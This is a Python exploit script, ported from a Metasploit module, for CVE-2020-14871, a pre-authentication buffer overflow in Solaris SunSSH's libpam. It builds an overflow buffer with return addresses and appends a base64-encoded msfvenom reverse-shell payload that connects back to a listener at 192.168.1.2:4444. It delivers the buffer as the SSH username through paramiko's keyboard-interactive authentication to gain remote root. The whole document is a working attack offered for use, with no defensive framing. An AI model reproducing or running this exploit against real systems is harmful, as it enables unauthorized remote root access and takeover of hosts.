# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2) # Original Exploit Author: Hacker Fantastic # Metasploit Module Author: wvu # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html # Version: 10 # Tested on: SunOS solaris 10 # CVE: CVE-2020-14871 # Ported By: legend import socket import paramiko from time import sleep payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe" payload+=b"python${IFS}-c${IFS}\"" # msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444 payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))" payload+=b"\"" print("Length => %d" % (len(payload))) def inter_handler(title, instructions, prompt_list): resp = [] #Initialize the response container for pr in prompt_list: print(pr) if pr[0].startswith('Please enter user name:'): sleep(10) resp.append(payload) print("Your payload is sended check your nc") return tuple(resp) import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("192.168.1.2", 22)) ts = paramiko.Transport(sock) ts.start_client(timeout=10) ts.auth_interactive(username="", handler=inter_handler)